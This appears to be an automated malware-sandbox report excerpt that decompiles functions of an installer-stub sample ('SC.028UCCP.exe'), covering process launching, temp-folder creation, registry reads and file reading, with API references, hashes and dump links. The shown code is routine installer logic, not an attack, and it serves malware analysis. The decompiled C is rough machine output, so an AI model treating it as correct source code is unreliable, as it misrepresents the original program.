0x00404e50
0x00404e88
0x00404e88
0x00000000
0x00404e88
0x00404e5c
0x00404e5e
0x00000000
0x00404e5e
0x00404e2d
0x00000000
0x00000000
0x00404e34
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 00404E48
CallWindowProcA.USER32(?,?,?,?), ref: 00404E99

Part of subcall function 00403EF4: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00403F06

Strings

, xrefs: 00404E29

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 6c28c937d32deeee8c4a4a7d7415759edd1eb229d143a9345964d33634643e2f
Instruction ID: 15cec7ad730383037ace73de1cf566d9f400779eaaed3c89d674d6bcdef9eb11
Opcode Fuzzy Hash: 6c28c937d32deeee8c4a4a7d7415759edd1eb229d143a9345964d33634643e2f
Instruction Fuzzy Hash: 20015EB1100208AFDF215F11DC85A9B3A2AF7D4765F50413AFF04762D1C37A9C91DBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				intOrPtr _t15;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t15 =  *0x42ebd0; // 0x65216c
					_t6 = _t17 * 0x1c + _t15;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42e38c =  *0x42e38c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42e38c, 0x7530,  *0x42e374), 0);
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x00401392
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(?,00000402,00000000), ref: 004013F4

Strings

l!e, xrefs: 00401392

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: MessageSend
String ID: l!e
API String ID: 3850602802-264989538
Opcode ID: 6a14d1f73b45d8c574bbb08bd463b0fecddd08d442bdf50b9e33ff1249aac855
Instruction ID: 2f867942e182ee5f7aafd3a4eddd62757609932d8a5da55f1e4142973db533dc
Opcode Fuzzy Hash: 6a14d1f73b45d8c574bbb08bd463b0fecddd08d442bdf50b9e33ff1249aac855
Instruction Fuzzy Hash: 0F01F431B242109BE7298B399C04B6A36D8E710325F10863BF811F72F1D678DC039B4D

Uniqueness

Uniqueness Score: -1.00%

Function 00405368 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405368(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x42b828->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x42b828,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x00405371
0x0040538d
0x00405395
0x0040539a
0x00000000
0x004053a0
0x004053a4

APIs

CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0042B828,Error launching installer), ref: 0040538D
CloseHandle.KERNEL32(?), ref: 0040539A

Strings

Error launching installer, xrefs: 0040537B

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: b3998ada7a220c47db69c0c22e20a9525334f7800375aa12388a5f4127d2dad1
Instruction ID: 8a6f12bc318ec6a69002769553d16d4b3f873146e0ffdb4928c8eb689fb6cc4d
Opcode Fuzzy Hash: b3998ada7a220c47db69c0c22e20a9525334f7800375aa12388a5f4127d2dad1
Instruction Fuzzy Hash: 86E0ECB4A00209ABDB00AF64EC09A6B7BBCEB04344F408531E914E2150E778E9109AA9

Uniqueness

Uniqueness Score: -1.00%

Function 004030D7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E004030D7(void* __eflags) {
				void* _t2;
				void* _t5;
				CHAR* _t6;

				_t6 = "C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
				E00405E03(_t6);
				_t2 = E004056B2(_t6);
				if(_t2 != 0) {
					E00405645(_t6);
					CreateDirectoryA(_t6, 0); // executed
					_t5 = E00405875("1033", _t6); // executed
					return _t5;
				} else {
					return _t2;
				}
			}

0x004030d8
0x004030de
0x004030e4
0x004030eb
0x004030f0
0x004030f8
0x00403104
0x0040310a
0x004030ee
0x004030ee
0x004030ee

APIs

Part of subcall function 00405E03: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\SC.028UCCP.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030E3,C:\Users\user\AppData\Local\Temp\,75DD3410,004032BD), ref: 00405E5B
Part of subcall function 00405E03: CharNextA.USER32(?,?,?,00000000), ref: 00405E68
Part of subcall function 00405E03: CharNextA.USER32(?,"C:\Users\user\Desktop\SC.028UCCP.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030E3,C:\Users\user\AppData\Local\Temp\,75DD3410,004032BD), ref: 00405E6D
Part of subcall function 00405E03: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030E3,C:\Users\user\AppData\Local\Temp\,75DD3410,004032BD), ref: 00405E7D

CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75DD3410,004032BD), ref: 004030F8

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004030D8, 004030DD, 004030E3, 004030EF, 004030F7, 004030FE
1033, xrefs: 004030FF

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID: 1033$C:\Users\user\AppData\Local\Temp\
API String ID: 4115351271-2414109610
Opcode ID: d7628b9f20a1b5c325ff348988f8c285fe8ae7ec7af24a77171c77d708be0feb
Instruction ID: fd0f6b97774aff97ce55239a91fc0964d985d8a64bd9372f8197c1aef795e8ac
Opcode Fuzzy Hash: d7628b9f20a1b5c325ff348988f8c285fe8ae7ec7af24a77171c77d708be0feb
Instruction Fuzzy Hash: 18D05222506C3022E15133267C16FCF060C8F4A31AF919077F408710824A2E4A8208FE

Uniqueness

Uniqueness Score: -1.00%

Function 00401B11 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72
memoryCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401B11(void* __ebx, void* __edx) {
				intOrPtr _t7;
				void* _t8;
				void _t11;
				void* _t13;
				void* _t21;
				void* _t24;
				void* _t30;
				void* _t33;
				void* _t34;
				void* _t37;

				_t27 = __ebx;
				_t7 =  *((intOrPtr*)(_t37 - 0x1c));
				_t30 =  *0x40afc4; // 0x0
				if(_t7 == __ebx) {
					if(__edx == __ebx) {
						_t8 = GlobalAlloc(0x40, 0x404); // executed
						_t34 = _t8;
						_t4 = _t34 + 4; // 0x4
						E00405BBA(__ebx, _t30, _t34, _t4,  *((intOrPtr*)(_t37 - 0x24)));
						_t11 =  *0x40afc4; // 0x0
						 *_t34 = _t11;
						 *0x40afc4 = _t34;
					} else {
						if(_t30 == __ebx) {
							 *((intOrPtr*)(_t37 - 4)) = 1;
						} else {
							_t2 = _t30 + 4; // 0x4
							E00405B98(_t33, _t2);
							_push(_t30);
							 *0x40afc4 =  *_t30;
							GlobalFree();
						}
					}
					goto L15;
				} else {
					while(1) {
						_t7 = _t7 - 1;
						if(_t30 == _t27) {
							break;
						}
						_t30 =  *_t30;
						if(_t7 != _t27) {
							continue;
						} else {
							if(_t30 == _t27) {
								break;
							} else {
								_t32 = _t30 + 4;
								E00405B98(0x409bc0, _t30 + 4);
								_t21 =  *0x40afc4; // 0x0
								E00405B98(_t32, _t21 + 4);
								_t24 =  *0x40afc4; // 0x0
								_push(0x409bc0);
								_push(_t24 + 4);
								E00405B98();
								L15:
								 *0x42ec28 =  *0x42ec28 +  *((intOrPtr*)(_t37 - 4));
								_t13 = 0;
							}
						}
						goto L17;
					}
					_push(0x200010);
					_push(E00405BBA(_t27, _t30, _t33, _t27, 0xffffffe8));
					E004053C9();
					_t13 = 0x7fffffff;
				}
				L17:
				return _t13;
			}

0x00401b11
0x00401b11
0x00401b14
0x00401b1c
0x00401b64
0x00401b92
0x00401b9b
0x00401b9d
0x00401ba1
0x00401ba6
0x00401bab
0x00401bad
0x00401b66
0x00401b68
0x0040266d
0x00401b6e
0x00401b6e
0x00401b73
0x00401b7a
0x00401b7b
0x00401b80
0x00401b80
0x00401b68
0x00000000
0x00401b1e
0x00401b1e
0x00401b1e
0x00401b21
0x00000000
0x00000000
0x00401b27
0x00401b2b
0x00000000
0x00401b2d
0x00401b2f
0x00000000
0x00401b35
0x00401b35
0x00401b3f
0x00401b44
0x00401b4e
0x00401b53
0x00401b58
0x00401b5c
0x004027c2
0x0040289c
0x0040289f
0x004028a5
0x004028a5
0x00401b2f
0x00000000
0x00401b2b
0x00402211
0x0040221e
0x0040221f
0x00402224
0x00402224
0x004028a7
0x004028ab

APIs

GlobalFree.KERNEL32(00000000), ref: 00401B80
GlobalAlloc.KERNELBASE(00000040,00000404), ref: 00401B92

Strings

Call, xrefs: 00401B38, 00401B3E, 00401B58

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: Global$AllocFree
String ID: Call
API String ID: 3394109436-1824292864
Opcode ID: a58bceada041626c77a9415b2187daccc7872390f28df3146622465e37d553ae
Instruction ID: bfdb79625eb78255327a415742f54a265397f278bf875e9f7b12c7fb5acb2754
Opcode Fuzzy Hash: a58bceada041626c77a9415b2187daccc7872390f28df3146622465e37d553ae
Instruction Fuzzy Hash: DA21C0B2A00201ABD710ABA5DF88D5F73B5EB49314724057BF501F32D2D6BCB8118B1E

Uniqueness

Uniqueness Score: -1.00%

Function 00401E32 Relevance: 4.5, APIs: 3, Instructions: 48
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00401E32() {
				void* _t15;
				void* _t24;
				void* _t26;
				void* _t31;

				_t28 = E00402A07(_t24);
				E00404EA5(0xffffffeb, _t13);
				_t15 = E00405368(_t28); // executed
				 *(_t31 + 8) = _t15;
				if(_t15 == _t24) {
					 *((intOrPtr*)(_t31 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t31 - 0x1c)) != _t24) {
						while(WaitForSingleObject( *(_t31 + 8), 0x64) == 0x102) {
							E00405EFC(0xf);
						}
						GetExitCodeProcess( *(_t31 + 8), _t31 - 8);
						if( *((intOrPtr*)(_t31 - 0x20)) < _t24) {
							if( *(_t31 - 8) != _t24) {
								 *((intOrPtr*)(_t31 - 4)) = 1;
							}
						} else {
							E00405AF6(_t26,  *(_t31 - 8));
						}
					}
					_push( *(_t31 + 8));
					CloseHandle();
				}
				 *0x42ec28 =  *0x42ec28 +  *((intOrPtr*)(_t31 - 4));
				return 0;
			}

0x00401e38
0x00401e3d
0x00401e43
0x00401e4a
0x00401e4d
0x0040266d
0x00401e53
0x00401e56
0x00401e67
0x00401e62
0x00401e62
0x00401e7c
0x00401e85
0x00401e95
0x00401e97
0x00401e97
0x00401e87
0x00401e8b
0x00401e8b
0x00401e85
0x00401e9e
0x00401ea1
0x00401ea1
0x0040289f
0x004028ab

APIs

Part of subcall function 00404EA5: lstrlenA.KERNEL32(00429800,00000000,0041B7D0,75DD23A0,?,?,?,?,?,?,?,?,?,00402FC7,00000000,?), ref: 00404EDE
Part of subcall function 00404EA5: lstrlenA.KERNEL32(00402FC7,00429800,00000000,0041B7D0,75DD23A0,?,?,?,?,?,?,?,?,?,00402FC7,00000000), ref: 00404EEE
Part of subcall function 00404EA5: lstrcatA.KERNEL32(00429800,00402FC7,00402FC7,00429800,00000000,0041B7D0,75DD23A0), ref: 00404F01
Part of subcall function 00404EA5: SetWindowTextA.USER32(00429800,00429800), ref: 00404F13
Part of subcall function 00404EA5: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F39
Part of subcall function 00404EA5: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F53
Part of subcall function 00404EA5: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F61

Part of subcall function 00405368: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0042B828,Error launching installer), ref: 0040538D
Part of subcall function 00405368: CloseHandle.KERNEL32(?), ref: 0040539A

WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E6C
GetExitCodeProcess.KERNEL32(?,?), ref: 00401E7C
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EA1

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
String ID:
API String ID: 3521207402-0
Opcode ID: d7504f88e5ee259c9d8fcc88f305a0f970c784f62c979d876af5dfa2b13a1e46
Instruction ID: 47b0888271ef8fef87928745203e2db848c347203f0d50bde1ae1afdf34c4489
Opcode Fuzzy Hash: d7504f88e5ee259c9d8fcc88f305a0f970c784f62c979d876af5dfa2b13a1e46
Instruction Fuzzy Hash: BE018031A04219EBDF10AFA1CD859AE7B71EB00344F20857BF601B51E1C7B95A81EF9A

Uniqueness

Uniqueness Score: -1.00%

Function 00405A7F Relevance: 4.5, APIs: 3, Instructions: 45
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00405A7F(void* _a4, int _a8, char* _a12, int _a16, void* _a20) {
				long _t20;
				long _t23;
				long _t24;
				char* _t26;

				asm("sbb eax, eax");
				_t26 = _a16;
				 *_t26 = 0;
				_t20 = RegOpenKeyExA(_a4, _a8, 0,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed
				if(_t20 == 0) {
					_a8 = 0x400;
					_t23 = RegQueryValueExA(_a20, _a12, 0,  &_a16, _t26,  &_a8); // executed
					if(_t23 != 0 || _a16 != 1 && _a16 != 2) {
						 *_t26 = 0;
					}
					_t26[0x3ff] = 0;
					_t24 = RegCloseKey(_a20); // executed
					return _t24;
				}
				return _t20;
			}

0x00405a8f
0x00405a91
0x00405a9e
0x00405aa8
0x00405ab0
0x00405ab5
0x00405ac9
0x00405ad1
0x00405adf
0x00405adf
0x00405ae4
0x00405aea
0x00000000
0x00405aea
0x00405af3

APIs

RegOpenKeyExA.KERNELBASE(80000002,00405CC4,00000000,00000002,?,00000002,00224731,?,00405CC4,80000002,Software\Microsoft\Windows\CurrentVersion,00224731,Call,00653309), ref: 00405AA8
RegQueryValueExA.KERNELBASE(00224731,?,00000000,00405CC4,00224731,00405CC4), ref: 00405AC9
RegCloseKey.KERNELBASE(?), ref: 00405AEA

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: a7dc294ab98d1aedf48ab84cf89b8b0d9a3be53888eb2216a8b2e534b80ab0d4
Instruction ID: 71ae70624bec2c47f0bbb1bb8334a3f1983087d908a17f43c3698e5adb36173d
Opcode Fuzzy Hash: a7dc294ab98d1aedf48ab84cf89b8b0d9a3be53888eb2216a8b2e534b80ab0d4
Instruction Fuzzy Hash: 4E01487114020AEFDF128F64EC88AEB3FACEF14358F004126F906A6220D235D964DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00402438 Relevance: 4.5, APIs: 3, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00402438(int* __ebx, char* __esi) {
				void* _t7;
				int _t8;
				long _t11;
				int* _t14;
				void* _t18;
				char* _t20;
				void* _t22;
				void* _t25;

				_t20 = __esi;
				_t14 = __ebx;
				_t7 = E00402B11(_t25, 0x20019); // executed
				_t18 = _t7;
				_t8 = E004029EA(3);
				 *__esi = __ebx;
				if(_t18 == __ebx) {
					L7:
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					 *(_t22 + 8) = 0x3ff;
					if( *((intOrPtr*)(_t22 - 0x14)) == __ebx) {
						_t11 = RegEnumValueA(_t18, _t8, __esi, _t22 + 8, __ebx, __ebx, __ebx, __ebx);
						__eflags = _t11;
						if(_t11 != 0) {
							goto L7;
						} else {
							goto L4;
						}
					} else {
						RegEnumKeyA(_t18, _t8, __esi, 0x3ff);
						L4:
						_t20[0x3ff] = _t14;
						_push(_t18);
						RegCloseKey();
					}
				}
				 *0x42ec28 =  *0x42ec28 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}

0x00402438
0x00402438
0x0040243d
0x00402444
0x00402446
0x0040244d
0x0040244f
0x0040266d
0x0040266d
0x00402455
0x0040245d
0x00402460
0x00402479
0x0040247f
0x00402481
0x00000000
0x00000000
0x00000000
0x00000000
0x00402462
0x00402466
0x00402487
0x00402487
0x0040248d
0x0040248e
0x0040248e
0x00402460
0x0040289f
0x004028ab

APIs

Part of subcall function 00402B11: RegOpenKeyExA.KERNELBASE(00000000,000003F6,00000000,00000022,00000000,?,?), ref: 00402B39

RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402466
RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 00402479
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsc7F31.tmp,00000000,?,?,?,00000100,?,?,?,00000011,00000002), ref: 0040248E

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: Enum$CloseOpenValue
String ID:
API String ID: 167947723-0
Opcode ID: 4e936370a045a5093ba77e57e34387299b70895795c41cc5222d621ec4f5c703
Instruction ID: e1b674d6fa50b79099c3a4ad1b77673b9663613076e8f513ce388d427edaab02
Opcode Fuzzy Hash: 4e936370a045a5093ba77e57e34387299b70895795c41cc5222d621ec4f5c703
Instruction Fuzzy Hash: 1FF0FF72A04204EFEB119F699E8CEBF7A6CEF40348F10483FF005B61C0D6B95E41962A

Uniqueness

Uniqueness Score: -1.00%

Function 1000279C Relevance: 3.2, APIs: 2, Instructions: 156
fileCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E1000279C(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				void* _t31;
				void* _t32;
				int _t36;
				void* _t40;
				void* _t49;
				void* _t54;
				void* _t58;
				signed int _t65;
				void* _t70;
				void* _t79;
				intOrPtr _t81;
				signed int _t88;
				intOrPtr _t90;
				intOrPtr _t91;
				void* _t92;
				void* _t94;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				intOrPtr _t106;
				intOrPtr _t107;

				if( *0x10004040 != 0 && E1000271E(_a4) == 0) {
					 *0x10004044 = _t106;
					if( *0x1000403c != 0) {
						_t106 =  *0x1000403c;
					} else {
						E10002CE0(E10002718(), __ecx);
						 *0x1000403c = _t106;
					}
				}
				_t31 = E1000275A(_a4);
				_t107 = _t106 + 4;
				if(_t31 <= 0) {
					L9:
					_t32 = E1000274E();
					_t81 = _a4;
					_t90 =  *0x10004048;
					 *((intOrPtr*)(_t32 + _t81)) = _t90;
					 *0x10004048 = _t81;
					E10002748();
					_t36 = ReadFile(??, ??, ??, ??, ??); // executed
					 *0x1000401c = _t36;
					 *0x10004020 = _t90;
					if( *0x10004040 != 0 && E1000271E( *0x10004048) == 0) {
						 *0x1000403c = _t107;
						_t107 =  *0x10004044;
					}
					_t91 =  *0x10004048;
					_a4 = _t91;
					 *0x10004048 =  *((intOrPtr*)(E1000274E() + _t91));
					_t40 = E1000272C(_t91);
					_pop(_t92);
					if(_t40 != 0) {
						_t49 = E1000275A(_t92);
						if(_t49 > 0) {
							_push(_t49);
							_push(E10002765() + _a4 + _v8);
							_push(E1000276F());
							if( *0x10004040 <= 0 || E1000271E(_a4) != 0) {
								_pop(_t101);
								_pop(_t54);
								if( *((intOrPtr*)(_t101 + _t54)) == 2) {
								}
								asm("loop 0xfffffff5");
							} else {
								_pop(_t102);
								_pop(_t58);
								 *0x1000403c =  *0x1000403c +  *(_t102 + _t58) * 4;
								asm("loop 0xffffffeb");
							}
						}
					}
					if( *0x10004048 == 0) {
						 *0x1000403c = 0;
					}
					_t94 = _a4 + E10002765();
					 *(E10002773() + _t94) =  *0x1000401c;
					 *((intOrPtr*)(E10002777() + _t94)) =  *0x10004020;
					E10002787(_a4);
					if(E1000273A() != 0) {
						 *0x10004058 = GetLastError();
					}
					return _a4;
				}
				_push(E10002765() + _a4);
				_t65 = E1000276B();
				_v8 = _t65;
				_t88 = _t31;
				_push(_t77 + _t65 * _t88);
				_t79 = E10002777();
				_t100 = E10002773();
				_t103 = E1000276F();
				_t70 = _t88;
				if( *((intOrPtr*)(_t103 + _t70)) == 2) {
					_push( *((intOrPtr*)(_t79 + _t70)));
				}
				_push( *((intOrPtr*)(_t100 + _t70)));
				asm("loop 0xfffffff1");
				goto L9;
			}

0x100027ac
0x100027bd
0x100027ca
0x100027de
0x100027cc
0x100027d1
0x100027d6
0x100027d6
0x100027ca
0x100027e7
0x100027ec
0x100027f2
0x10002836
0x10002836
0x1000283b
0x10002840
0x10002846
0x10002848
0x1000284e
0x1000285b
0x1000285d
0x10002862
0x1000286f
0x10002882
0x10002888
0x1000288e
0x1000288f
0x10002895
0x100028a1
0x100028a7
0x100028af
0x100028b0
0x100028b3
0x100028be
0x100028c0
0x100028cc
0x100028d2
0x100028da
0x10002906
0x10002907
0x1000290d
0x1000290d
0x10002914
0x100028ea
0x100028ea
0x100028eb
0x100028f9
0x10002902
0x10002902
0x100028da
0x100028be
0x1000291d
0x1000291f
0x1000291f
0x10002931
0x1000293e
0x1000294c
0x10002952
0x10002960
0x10002968
0x10002968
0x10002976
0x10002976
0x100027fd
0x100027fe
0x10002803
0x10002807
0x1000280c
